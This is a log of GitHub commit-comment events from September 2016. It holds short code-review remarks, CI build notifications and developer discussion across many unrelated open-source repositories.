{"id":"4555713997","type":"CommitCommentEvent","actor":{"login":"LorenzMeier"},"repo":{"name":"PX4/jMAVSim"},"payload":{"comment":{"id":19001754,"position":null,"line":null,"path":null,"commit_id":"bf1490e35d9a47da09b56c7f78c4edd96a13a701","created_at":"2016-09-13T13:51:20Z","updated_at":"2016-09-13T13:51:20Z","body":"I don't understand the question I guess. My goal was to get the vehicle closer to the usual specs in terms of total weight."}},"created_at":"2016-09-13T13:51:20Z"}
{"id":"4555716551","type":"CommitCommentEvent","actor":{"login":"lgauthier"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":19001760,"position":179,"line":253,"path":"Sources/DataManager.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-13T13:51:43Z","updated_at":"2016-09-13T13:51:43Z","body":"Looks like `fetchRequest` is only available in iOS 10, so you'll just have to do this:\r\n\r\n```\r\nlet request = NSFetchRequest<T>(entityName: String(describing: entity))\r\n```"}},"created_at":"2016-09-13T13:51:43Z"}
{"id":"4555718207","type":"CommitCommentEvent","actor":{"login":"OndrejMarsalek"},"repo":{"name":"epfl-cosmo/i-pi-dev"},"payload":{"comment":{"id":19001763,"position":null,"line":null,"path":null,"commit_id":"61270a30fa61fa4e7b52e11acbdda3e26b600839","created_at":"2016-09-13T13:51:59Z","updated_at":"2016-09-13T13:51:59Z","body":"Hey, I have some code to do this (almost) ready to go, so I would like to discuss differences and similarities first. Also, can we please do it in a new branch?"}},"created_at":"2016-09-13T13:51:59Z"}
{"id":"4555718287","type":"CommitCommentEvent","actor":{"login":"axelchalon"},"repo":{"name":"jolocom/little-sister"},"payload":{"comment":{"id":19001764,"position":2,"line":65,"path":"src/js/lib/util.js","commit_id":"6fa4509078095f69de925b059c927401ac7da9d9","created_at":"2016-09-13T13:52:00Z","updated_at":"2016-09-13T13:52:00Z","body":"Maybe HEAD request?"}},"created_at":"2016-09-13T13:52:00Z"}
{"id":"4555720355","type":"CommitCommentEvent","actor":{"login":"qiaozhanrong"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":19001767,"position":null,"line":null,"path":null,"commit_id":"08c75637edb3c38da12623ff302ea6824aa3f806","created_at":"2016-09-13T13:52:22Z","updated_at":"2016-09-13T13:52:22Z","body":"等等好像不对"}},"created_at":"2016-09-13T13:52:22Z"}
{"id":"4555721884","type":"CommitCommentEvent","actor":{"login":"leticiaquino"},"repo":{"name":"scieloorg/scielo_publishing_schema"},"payload":{"comment":{"id":19001777,"position":4,"line":77,"path":"docs/source/tagset/elemento-article.rst","commit_id":"fc5d69bef74a5d8cdb88f8c913ed09e45d58b62a","created_at":"2016-09-13T13:52:36Z","updated_at":"2016-09-13T13:52:36Z","body":"OMG..\r\nQuer q eu revise os diffs??"}},"created_at":"2016-09-13T13:52:36Z"}
{"id":"4555723461","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19001782,"position":null,"line":null,"path":null,"commit_id":"ccda4a3ddc52c60d81d1f9ae1f834025a1c5201a","created_at":"2016-09-13T13:52:51Z","updated_at":"2016-09-13T13:52:51Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 986](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13177&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 247, ignored: 3 Build time: 00:11:24"}},"created_at":"2016-09-13T13:52:51Z"}
{"id":"4555726862","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19001792,"position":null,"line":null,"path":null,"commit_id":"31b0f748744b1bc957ab74ea5bdffa18a830935d","created_at":"2016-09-13T13:53:25Z","updated_at":"2016-09-13T13:53:25Z","body":"Couldn't we better fall back to http if https fails?"}},"created_at":"2016-09-13T13:53:25Z"}
{"id":"4555728439","type":"CommitCommentEvent","actor":{"login":"Procrat"},"repo":{"name":"paretje/dotfiles"},"payload":{"comment":{"id":19001797,"position":null,"line":null,"path":null,"commit_id":"dcd91c4221789782744ae998dfd1e10b5a14abb5","created_at":"2016-09-13T13:53:41Z","updated_at":"2016-09-13T13:53:41Z","body":"Oh, I see. This is cool! So this has no disadvantages, except the extra information message, but you could do away with that with output redirections. Awesome!\r\n\r\nBy the way, I think it's funny that `-quiet` makes `xclip` print out more. 😄 "}},"created_at":"2016-09-13T13:53:41Z"}
{"id":"4555728705","type":"CommitCommentEvent","actor":{"login":"gustavofonseca"},"repo":{"name":"scieloorg/scielo_publishing_schema"},"payload":{"comment":{"id":19001800,"position":37,"line":38,"path":"docs/source/tagset/elemento-related-article.rst","commit_id":"fc5d69bef74a5d8cdb88f8c913ed09e45d58b62a","created_at":"2016-09-13T13:53:44Z","updated_at":"2016-09-13T13:53:44Z","body":"Sim, mas é inconsistente. "}},"created_at":"2016-09-13T13:53:44Z"}
{"id":"4555730346","type":"CommitCommentEvent","actor":{"login":"klightspeed"},"repo":{"name":"EDDiscovery/EDDiscovery"},"payload":{"comment":{"id":19001801,"position":null,"line":null,"path":null,"commit_id":"73bc0e70bb180601fdb2abeb64db27bb468a3ae2","created_at":"2016-09-13T13:54:01Z","updated_at":"2016-09-13T13:54:01Z","body":"I don't think Microsoft is likely to go much further with any port, seeing as Mono is developed by Xamarin, which is now owned by Microsoft."}},"created_at":"2016-09-13T13:54:01Z"}
{"id":"4555741558","type":"CommitCommentEvent","actor":{"login":"Vaqtincha"},"repo":{"name":"s1lentq/ReGameDLL_CS"},"payload":{"comment":{"id":19001827,"position":null,"line":null,"path":null,"commit_id":"69b856a8478b99efb0d0317790051410d5f82826","created_at":"2016-09-13T13:55:51Z","updated_at":"2016-09-13T13:55:51Z","body":"ОТЛИЧНО! А потом фгд будет со всеми новинками ?"}},"created_at":"2016-09-13T13:55:51Z"}
{"id":"4555751262","type":"CommitCommentEvent","actor":{"login":"tshemsedinov"},"repo":{"name":"metarhia/JSTP"},"payload":{"comment":{"id":19001865,"position":63,"line":63,"path":"tests/serializer.test.js","commit_id":"4ebf33db5c0eb34af126f6dc6c9f8d29b92bc73c","created_at":"2016-09-13T13:57:25Z","updated_at":"2016-09-13T13:57:25Z","body":"We do not need `Data` type in raw JSTP packets. We will encode data in simple `string` and will have schema with `type: 'Date'` to interpret this string as `Date` when we need it. "}},"created_at":"2016-09-13T13:57:25Z"}
{"id":"4555753539","type":"CommitCommentEvent","actor":{"login":"gustavofonseca"},"repo":{"name":"scieloorg/scielo_publishing_schema"},"payload":{"comment":{"id":19001881,"position":37,"line":38,"path":"docs/source/tagset/elemento-related-article.rst","commit_id":"fc5d69bef74a5d8cdb88f8c913ed09e45d58b62a","created_at":"2016-09-13T13:57:45Z","updated_at":"2016-09-13T13:57:45Z","body":"Não estou pedindo para mudar.. foi só uma dúvida/comentário.. "}},"created_at":"2016-09-13T13:57:45Z"}
{"id":"4555753591","type":"CommitCommentEvent","actor":{"login":"brentp"},"repo":{"name":"chapmanb/bcbio-nextgen"},"payload":{"comment":{"id":19001882,"position":null,"line":null,"path":null,"commit_id":"5e6d09ee0c46f22a8cb27b07903c7db9853281dd","created_at":"2016-09-13T13:57:46Z","updated_at":"2016-09-13T13:57:46Z","body":"sweet. thanks Brad."}},"created_at":"2016-09-13T13:57:46Z"}
{"id":"4555753993","type":"CommitCommentEvent","actor":{"login":"martin-gorner"},"repo":{"name":"martin-gorner/tensorflow-mnist-tutorial"},"payload":{"comment":{"id":19001886,"position":null,"line":null,"path":null,"commit_id":"b010098ff0e4cddbc448fa4b24a5fec13e57ce31","created_at":"2016-09-13T13:57:50Z","updated_at":"2016-09-13T13:57:50Z","body":"I tried your fix but removing the call to plt.style makes it really ugly and accessing axes.color_cycle generates a \"deprecated\" warning. It works as a quick fix to get you up and running but not as a permanent fix. I'll have to investigate Python 3.4 compatibility a bit more."}},"created_at":"2016-09-13T13:57:50Z"}
{"id":"4555757467","type":"CommitCommentEvent","actor":{"login":"sparkzlab"},"repo":{"name":"sparkzlab/Beta1.0"},"payload":{"comment":{"id":19001900,"position":null,"line":null,"path":null,"commit_id":"d6109d5e58304cf522821f03bd8ef4517cb2b096","created_at":"2016-09-13T13:58:26Z","updated_at":"2016-09-13T13:58:26Z","body":"El mapa queda muy zoomed on no? "}},"created_at":"2016-09-13T13:58:26Z"}
{"id":"4555760012","type":"CommitCommentEvent","actor":{"login":"tshemsedinov"},"repo":{"name":"metarhia/JSTP"},"payload":{"comment":{"id":19001915,"position":null,"line":null,"path":null,"commit_id":"4ebf33db5c0eb34af126f6dc6c9f8d29b92bc73c","created_at":"2016-09-13T13:58:49Z","updated_at":"2016-09-13T13:58:49Z","body":"Why we do not use impress simple testing utilities here?"}},"created_at":"2016-09-13T13:58:49Z"}
{"id":"4555761863","type":"CommitCommentEvent","actor":{"login":"leticiaquino"},"repo":{"name":"scieloorg/scielo_publishing_schema"},"payload":{"comment":{"id":19001920,"position":37,"line":38,"path":"docs/source/tagset/elemento-related-article.rst","commit_id":"fc5d69bef74a5d8cdb88f8c913ed09e45d58b62a","created_at":"2016-09-13T13:59:07Z","updated_at":"2016-09-13T13:59:07Z","body":"@gustavofonseca você acha que pode ficar confuso para quem utilizar a documentação?"}},"created_at":"2016-09-13T13:59:07Z"}
{"id":"4555763285","type":"CommitCommentEvent","actor":{"login":"shawnbuso"},"repo":{"name":"googleads/videojs-ima"},"payload":{"comment":{"id":19001925,"position":null,"line":null,"path":null,"commit_id":"e716d60d2cebe9dc830a09044b3eacc18d2dfb17","created_at":"2016-09-13T13:59:20Z","updated_at":"2016-09-13T13:59:20Z","body":"Ah ok thanks for the info - since this seems specific to your implementation I think it makes sense to leave the plugin code as-is. If we get more reports of people running into issues with it we can open up an FR to change it."}},"created_at":"2016-09-13T13:59:20Z"}
{"id":"4555763423","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19001927,"position":null,"line":null,"path":null,"commit_id":"841ba8d039b8748ab20bd6c0d76ba8f4ec2b3a34","created_at":"2016-09-13T13:59:22Z","updated_at":"2016-09-13T13:59:22Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 987](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13181&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-13T13:59:22Z"}
{"id":"4555763893","type":"CommitCommentEvent","actor":{"login":"asd19903106"},"repo":{"name":"asd19903106/teach"},"payload":{"comment":{"id":19001928,"position":null,"line":null,"path":null,"commit_id":"bed04b6c5ff4e93b32f6572f1b32425723fa4613","created_at":"2016-09-13T13:59:26Z","updated_at":"2016-09-13T13:59:26Z","body":"tt"}},"created_at":"2016-09-13T13:59:26Z"}
{"id":"4555764124","type":"CommitCommentEvent","actor":{"login":"sparkzlab"},"repo":{"name":"sparkzlab/Beta1.0"},"payload":{"comment":{"id":19001931,"position":null,"line":null,"path":null,"commit_id":"d6109d5e58304cf522821f03bd8ef4517cb2b096","created_at":"2016-09-13T13:59:28Z","updated_at":"2016-09-13T13:59:28Z","body":"@nicolaspetticanperez"}},"created_at":"2016-09-13T13:59:28Z"}
{"id":"4555769038","type":"CommitCommentEvent","actor":{"login":"paretje"},"repo":{"name":"paretje/dotfiles"},"payload":{"comment":{"id":19001953,"position":null,"line":null,"path":null,"commit_id":"dcd91c4221789782744ae998dfd1e10b5a14abb5","created_at":"2016-09-13T14:00:18Z","updated_at":"2016-09-13T14:00:18Z","body":"Yes, but that's because the default is `-silent`, and then it makes sense ;)"}},"created_at":"2016-09-13T14:00:18Z"}
{"id":"4555771856","type":"CommitCommentEvent","actor":{"login":"handsomelin"},"repo":{"name":"SproutProject/pysite"},"payload":{"comment":{"id":19001957,"position":null,"line":null,"path":null,"commit_id":"da034ad7d2986e1ed65eb458d6e4cc97c47973f9","created_at":"2016-09-13T14:00:42Z","updated_at":"2016-09-13T14:00:42Z","body":"hello"}},"created_at":"2016-09-13T14:00:42Z"}
{"id":"4555773040","type":"CommitCommentEvent","actor":{"login":"sparkzlab"},"repo":{"name":"sparkzlab/Beta1.0"},"payload":{"comment":{"id":19001959,"position":null,"line":null,"path":null,"commit_id":"d6109d5e58304cf522821f03bd8ef4517cb2b096","created_at":"2016-09-13T14:00:53Z","updated_at":"2016-09-13T14:00:53Z","body":"y la foto de londres esta un poco blurry"}},"created_at":"2016-09-13T14:00:53Z"}
{"id":"4555774845","type":"CommitCommentEvent","actor":{"login":"sunset1215"},"repo":{"name":"sunset1215/rcs"},"payload":{"comment":{"id":19001963,"position":null,"line":null,"path":null,"commit_id":"904fc6aff546e28c14ed88cfb28f544d05690602","created_at":"2016-09-13T14:01:13Z","updated_at":"2016-09-13T14:01:13Z","body":"@bangwu93 I think you might have pulled and merge the changes into your local branch before you edited the B1.txt. Let me try to add my own changes and commit first, and then you can try it again."}},"created_at":"2016-09-13T14:01:13Z"}
{"id":"4555775903","type":"CommitCommentEvent","actor":{"login":"bratwurzt"},"repo":{"name":"Bedework/bw-caldav"},"payload":{"comment":{"id":19001966,"position":19,"line":38,"path":"bw-caldav-util/src/main/java/org/bedework/caldav/util/notifications/CollectionChangesType.java","commit_id":"875429f286196eda9f9a4f303e0c9e93564b8128","created_at":"2016-09-13T14:01:24Z","updated_at":"2016-09-13T14:01:24Z","body":"Where is BaseEntityChangeType class?"}},"created_at":"2016-09-13T14:01:24Z"}
{"id":"4555783150","type":"CommitCommentEvent","actor":{"login":"Procrat"},"repo":{"name":"paretje/dotfiles"},"payload":{"comment":{"id":19001975,"position":null,"line":null,"path":null,"commit_id":"dcd91c4221789782744ae998dfd1e10b5a14abb5","created_at":"2016-09-13T14:02:35Z","updated_at":"2016-09-13T14:02:35Z","body":"Oh, wow, there's `-quiet` and `-silent` at the same time. It gets better! 😄 "}},"created_at":"2016-09-13T14:02:35Z"}
{"id":"4555783254","type":"CommitCommentEvent","actor":{"login":"devernay"},"repo":{"name":"devernay/openfx-misc"},"payload":{"comment":{"id":19001976,"position":null,"line":null,"path":null,"commit_id":"b65a231770797d89824be2d66c337a31fb8e5b42","created_at":"2016-09-13T14:02:36Z","updated_at":"2016-09-13T14:02:36Z","body":"- Keyer yes b0a1275\r\n- HSVTool no because it uses no notion of luminance http://en.wikipedia.org/wiki/HSL_and_HSV https://github.com/colour-science/colour/blob/develop/colour/models/rgb/deprecated.py\r\n- Saturation was updated b9e99ae\r\n- ColorCorrect, ColorLookup should be fixed too c215c7b"}},"created_at":"2016-09-13T14:02:36Z"}
{"id":"4555787796","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19001995,"position":null,"line":null,"path":null,"commit_id":"841ba8d039b8748ab20bd6c0d76ba8f4ec2b3a34","created_at":"2016-09-13T14:03:20Z","updated_at":"2016-09-13T14:03:20Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 987](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13181&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Compilation error: Scala compiler (new) Build time: 00:03:58"}},"created_at":"2016-09-13T14:03:20Z"}
{"id":"4555787894","type":"CommitCommentEvent","actor":{"login":"efge"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":19001997,"position":30,"line":30,"path":"nuxeo-core/nuxeo-core-query/src/main/java/org/nuxeo/ecm/platform/query/api/QuickFilterDefinition.java","commit_id":"cc9683727b9f82f2dfa0d49fba30168e258f5a77","created_at":"2016-09-13T14:03:21Z","updated_at":"2016-09-13T14:03:21Z","body":"Why not just `QuickFilter` ?"}},"created_at":"2016-09-13T14:03:21Z"}
{"id":"4555792639","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19002010,"position":null,"line":null,"path":null,"commit_id":"97282f61cd8b2155d13c6fcf10b49aa7773b5333","created_at":"2016-09-13T14:04:07Z","updated_at":"2016-09-13T14:04:07Z","body":"This is beginning to settle in the \"no good deed goes unpunished\" area. We cleaned up the defines in the ASM by setting a single preprocessor macro. However, when we hoisted the tests out of the ASM block, we had more cases to handle."}},"created_at":"2016-09-13T14:04:07Z"}
{"id":"4555794259","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19002016,"position":null,"line":null,"path":null,"commit_id":"9b5dc3c76534cc817e940b0dd3975d113b9fd5a8","created_at":"2016-09-13T14:04:24Z","updated_at":"2016-09-13T14:04:24Z","body":"This is beginning to settle in the \"no good deed goes unpunished\" area. We cleaned up the defines in the ASM by setting a single preprocessor macro. However, when we hoisted the tests out of the ASM block, we had more cases to handle."}},"created_at":"2016-09-13T14:04:24Z"}
{"id":"4555794509","type":"CommitCommentEvent","actor":{"login":"eddelbuettel"},"repo":{"name":"asieira/SnakeCharmR"},"payload":{"comment":{"id":19002017,"position":5,"line":4,"path":"src/Makevars.in","commit_id":"901965cc6b6a51786e8278d60621d2fe66228d77","created_at":"2016-09-13T14:04:27Z","updated_at":"2016-09-13T14:04:27Z","body":"If this is behind a `#` it won't work."}},"created_at":"2016-09-13T14:04:27Z"}
{"id":"4555802067","type":"CommitCommentEvent","actor":{"login":"efge"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":19002033,"position":22,"line":341,"path":"nuxeo-services/nuxeo-platform-query-api/src/main/java/org/nuxeo/ecm/platform/query/api/AbstractPageProvider.java","commit_id":"cc9683727b9f82f2dfa0d49fba30168e258f5a77","created_at":"2016-09-13T14:05:34Z","updated_at":"2016-09-13T14:05:34Z","body":"No need for `this` here."}},"created_at":"2016-09-13T14:05:34Z"}
{"id":"4555802686","type":"CommitCommentEvent","actor":{"login":"sathieu"},"repo":{"name":"mozilla-services/lua_sandbox_extensions"},"payload":{"comment":{"id":19002036,"position":5,"line":5,"path":"CMakeLists.txt","commit_id":"d3dbc6011ded3fab7c1caef1047144a2fea3f597","created_at":"2016-09-13T14:05:40Z","updated_at":"2016-09-13T14:05:40Z","body":"Hi @trink.\r\n\r\nWhy bumping cmake to 3.5? Seems to build fine here with 3.0.2."}},"created_at":"2016-09-13T14:05:40Z"}
{"id":"4555802851","type":"CommitCommentEvent","actor":{"login":"WPMGPRoSToTeMa"},"repo":{"name":"s1lentq/ReGameDLL_CS"},"payload":{"comment":{"id":19002038,"position":null,"line":null,"path":null,"commit_id":"69b856a8478b99efb0d0317790051410d5f82826","created_at":"2016-09-13T14:05:42Z","updated_at":"2016-09-13T14:05:42Z","body":"@Vaqtincha yes"}},"created_at":"2016-09-13T14:05:42Z"}
{"id":"4555802936","type":"CommitCommentEvent","actor":{"login":"moskupols"},"repo":{"name":"privet-team/minijava-compiler"},"payload":{"comment":{"id":19002040,"position":3,"line":3,"path":"Makefile","commit_id":"c2d91d095c5a2fad7dfe9c7f077fbba07135ee3c","created_at":"2016-09-13T14:05:43Z","updated_at":"2016-09-13T14:05:43Z","body":"А почему не `-lgtest -lgtest_main`?"}},"created_at":"2016-09-13T14:05:43Z"}
{"id":"4555803626","type":"CommitCommentEvent","actor":{"login":"martin-gorner"},"repo":{"name":"martin-gorner/tensorflow-mnist-tutorial"},"payload":{"comment":{"id":19002041,"position":null,"line":null,"path":null,"commit_id":"5d0a9b1a8468b3ae18d38e183187df435be56871","created_at":"2016-09-13T14:05:49Z","updated_at":"2016-09-13T14:05:49Z","body":"dmenin, that sounds like a Python 2.0 / 3.0 discrepancy. I will add a .0 to the constant."}},"created_at":"2016-09-13T14:05:49Z"}
{"id":"4555804982","type":"CommitCommentEvent","actor":{"login":"efge"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":19002044,"position":12,"line":52,"path":"nuxeo-services/nuxeo-platform-query-api/src/main/java/org/nuxeo/ecm/platform/query/core/BasePageProviderDescriptor.java","commit_id":"cc9683727b9f82f2dfa0d49fba30168e258f5a77","created_at":"2016-09-13T14:06:02Z","updated_at":"2016-09-13T14:06:02Z","body":"Remove empty line between annotation and field."}},"created_at":"2016-09-13T14:06:02Z"}
{"id":"4555807614","type":"CommitCommentEvent","actor":{"login":"inoas"},"repo":{"name":"cakephp/cakephp"},"payload":{"comment":{"id":19002045,"position":13,"line":335,"path":"lib/Cake/Cache/Engine/FileEngine.php","commit_id":"f5859ca7193dcd82433fb0f617d64b1fbd380801","created_at":"2016-09-13T14:06:28Z","updated_at":"2016-09-13T14:06:28Z","body":"`composer install` would do that for you, wouldn't it, as part of CakePHP installer hooks."}},"created_at":"2016-09-13T14:06:28Z"}
{"id":"4555807846","type":"CommitCommentEvent","actor":{"login":"gFreezer"},"repo":{"name":"cliffsmits007/POGOserver"},"payload":{"comment":{"id":19002047,"position":null,"line":null,"path":null,"commit_id":"3ffabf12746672f6c2ede156cf40bdbbf7e27dce","created_at":"2016-09-13T14:06:31Z","updated_at":"2016-09-13T14:06:31Z","body":"The API key should be entered by replacing the X's in the line `API_KEY: \"XXXXX\",` in cfg.js, not here..."}},"created_at":"2016-09-13T14:06:31Z"}
{"id":"4555808234","type":"CommitCommentEvent","actor":{"login":"CismE97"},"repo":{"name":"CismE97/MyFinance"},"payload":{"comment":{"id":19002048,"position":null,"line":null,"path":null,"commit_id":"eb09622dea189cf63093bc6f2ea1dd68c37a401d","created_at":"2016-09-13T14:06:34Z","updated_at":"2016-09-13T14:06:34Z","body":"Et ajout d'un datepicker sur les champs correspondants. "}},"created_at":"2016-09-13T14:06:34Z"}
{"id":"4555812393","type":"CommitCommentEvent","actor":{"login":"NataliKobriy"},"repo":{"name":"NataliKobriy/homework_4"},"payload":{"comment":{"id":19002059,"position":null,"line":null,"path":null,"commit_id":"3f63551cc63ceafc7d239e582fb4b75d5b8ea044","created_at":"2016-09-13T14:07:16Z","updated_at":"2016-09-13T14:07:16Z","body":"Замечание 2: база данных не корректно построена. В задании 5 будет исправлено"}},"created_at":"2016-09-13T14:07:16Z"}
{"id":"4555817104","type":"CommitCommentEvent","actor":{"login":"ibennetch"},"repo":{"name":"phpmyadmin/sql-parser"},"payload":{"comment":{"id":19002064,"position":null,"line":null,"path":null,"commit_id":"ed6d4f41379de59a4a4670e506fc5b7f2721e1b0","created_at":"2016-09-13T14:07:57Z","updated_at":"2016-09-13T14:07:57Z","body":"Nice work"}},"created_at":"2016-09-13T14:07:57Z"}
{"id":"4555820875","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19002073,"position":null,"line":null,"path":null,"commit_id":"c070773c0d245d759c23604641a7ede742d7e0b2","created_at":"2016-09-13T14:08:35Z","updated_at":"2016-09-13T14:08:35Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/32589/testReport/) for this commit**"}},"created_at":"2016-09-13T14:08:35Z"}
{"id":"4555822468","type":"CommitCommentEvent","actor":{"login":"dkniazev"},"repo":{"name":"dkniazev/test-project2"},"payload":{"comment":{"id":19002076,"position":1,"line":1,"path":"VeeamON.txt","commit_id":"cd065d227200ba7b6a3616f96676c50917ec35e8","created_at":"2016-09-13T14:08:51Z","updated_at":"2016-09-13T14:08:51Z","body":"Nice!"}},"created_at":"2016-09-13T14:08:51Z"}
{"id":"4555822597","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19002077,"position":null,"line":null,"path":null,"commit_id":"8fe157533ff768616c71cc6b0a5cec6044a84f32","created_at":"2016-09-13T14:08:52Z","updated_at":"2016-09-13T14:08:52Z","body":"You have applied the <a> tag on <li>. Due to this, when we hover over a link then the colour of the number before the name (like '2.' in '2. Arvind Shroff' ) is also changing. You should apply <a> inside the <li> on the text i.e. name."}},"created_at":"2016-09-13T14:08:52Z"}
{"id":"4555825341","type":"CommitCommentEvent","actor":{"login":"bbinet"},"repo":{"name":"mozilla-services/lua_sandbox_extensions"},"payload":{"comment":{"id":19002084,"position":5,"line":5,"path":"CMakeLists.txt","commit_id":"d3dbc6011ded3fab7c1caef1047144a2fea3f597","created_at":"2016-09-13T14:09:20Z","updated_at":"2016-09-13T14:09:20Z","body":"This was because of #19 (I also had the same issue as @elemoine). That weird that it compiles correctly for you with 3.0.2."}},"created_at":"2016-09-13T14:09:20Z"}
{"id":"4555826999","type":"CommitCommentEvent","actor":{"login":"kd0aij"},"repo":{"name":"PX4/jMAVSim"},"payload":{"comment":{"id":19002089,"position":null,"line":null,"path":null,"commit_id":"bf1490e35d9a47da09b56c7f78c4edd96a13a701","created_at":"2016-09-13T14:09:36Z","updated_at":"2016-09-13T14:09:36Z","body":"Should a properly set up copter hover at 50% throttle, and should arming be allowed only at minimum throttle?"}},"created_at":"2016-09-13T14:09:36Z"}
{"id":"4555827902","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19002094,"position":null,"line":null,"path":null,"commit_id":"5828aefbddb25f10082b8735a4ce3aafc9053704","created_at":"2016-09-13T14:09:44Z","updated_at":"2016-09-13T14:09:44Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 988](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13183&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-13T14:09:44Z"}
{"id":"4555831362","type":"CommitCommentEvent","actor":{"login":"elemoine"},"repo":{"name":"mozilla-services/lua_sandbox_extensions"},"payload":{"comment":{"id":19002101,"position":5,"line":5,"path":"CMakeLists.txt","commit_id":"d3dbc6011ded3fab7c1caef1047144a2fea3f597","created_at":"2016-09-13T14:10:19Z","updated_at":"2016-09-13T14:10:19Z","body":"The build issue occurs on the ssl extension."}},"created_at":"2016-09-13T14:10:19Z"}
{"id":"4555831922","type":"CommitCommentEvent","actor":{"login":"LorenzMeier"},"repo":{"name":"PX4/jMAVSim"},"payload":{"comment":{"id":19002102,"position":null,"line":null,"path":null,"commit_id":"bf1490e35d9a47da09b56c7f78c4edd96a13a701","created_at":"2016-09-13T14:10:24Z","updated_at":"2016-09-13T14:10:24Z","body":"I don't think that a particular hover throttle is a valid assumption. And arming should be only allowed at minimum throttle, yes."}},"created_at":"2016-09-13T14:10:24Z"}
{"id":"4555832468","type":"CommitCommentEvent","actor":{"login":"chrmarti"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19002105,"position":49,"line":243,"path":"src/vs/workbench/parts/search/browser/openAnythingHandler.ts","commit_id":"99d95ace6c7a5718c2f8f406b5b0e8a83a2aba71","created_at":"2016-09-13T14:10:28Z","updated_at":"2016-09-13T14:10:28Z","body":"Sounds good. Yes, this was the only thing I wanted to understand better. Thanks."}},"created_at":"2016-09-13T14:10:28Z"}
{"id":"4555834952","type":"CommitCommentEvent","actor":{"login":"sunset1215"},"repo":{"name":"sunset1215/rcs"},"payload":{"comment":{"id":19002113,"position":null,"line":null,"path":null,"commit_id":"904fc6aff546e28c14ed88cfb28f544d05690602","created_at":"2016-09-13T14:10:50Z","updated_at":"2016-09-13T14:10:50Z","body":"@bangwu93 Ok, I've pushed my commit. So first, don't fetch or pull from remote at all. Edit the B1.txt again, and commit to local branch. Next, try to push. This is where you should get an error. Now you can try to resolve the error.\r\n\r\n@kwonn Hi Nathan, maybe you want to try this too, since you were the first to push a new commit, there wasn't any error."}},"created_at":"2016-09-13T14:10:50Z"}
{"id":"4555835567","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":19002114,"position":5,"line":6,"path":"src/head_server/schedulers/BaseSchedulerType.js","commit_id":"5ae3f8e0ba8a43d0465d83490344fdd9306638e3","created_at":"2016-09-13T14:10:56Z","updated_at":"2016-09-13T14:10:56Z","body":"should be `require(\"./MatchObject\");`"}},"created_at":"2016-09-13T14:10:56Z"}
{"id":"4555837013","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19002121,"position":null,"line":null,"path":null,"commit_id":"be31e49e40a74af22da228b8402a86b96e7b7da4","created_at":"2016-09-13T14:11:13Z","updated_at":"2016-09-13T14:11:13Z","body":"Local Tests:\r\nScore of new vs base: 323 - 311 - 1570  [0.503] 2204 ELO 1.89 LTC but hash was set only to 4\r\nScore of new vs base: 24 - 21 - 118  [0.509] LTC hash=64 ongoing ..."}},"created_at":"2016-09-13T14:11:13Z"}
{"id":"4555838896","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":19002124,"position":5,"line":4,"path":"src/head_server/schedulers/RandomSchedulerType.js","commit_id":"7351d8c77763ae65ad0f73af2ac9f46302790aaa","created_at":"2016-09-13T14:11:30Z","updated_at":"2016-09-13T14:11:30Z","body":"`require(\"./BaseSchedulerType\");`"}},"created_at":"2016-09-13T14:11:30Z"}
{"id":"4555839673","type":"CommitCommentEvent","actor":{"login":"deruelle"},"repo":{"name":"ocarriles/sbc"},"payload":{"comment":{"id":19002125,"position":29,"line":29,"path":"application/src/main/webapp/WEB-INF/scripts/CentOS/ban.sh","commit_id":"c63bb8ed521f0f9cad1257a3248164ae591c8a11","created_at":"2016-09-13T14:11:37Z","updated_at":"2016-09-13T14:11:37Z","body":"We should add remove as well to include whitelisting if the blacklist was not correct for any reasons."}},"created_at":"2016-09-13T14:11:37Z"}
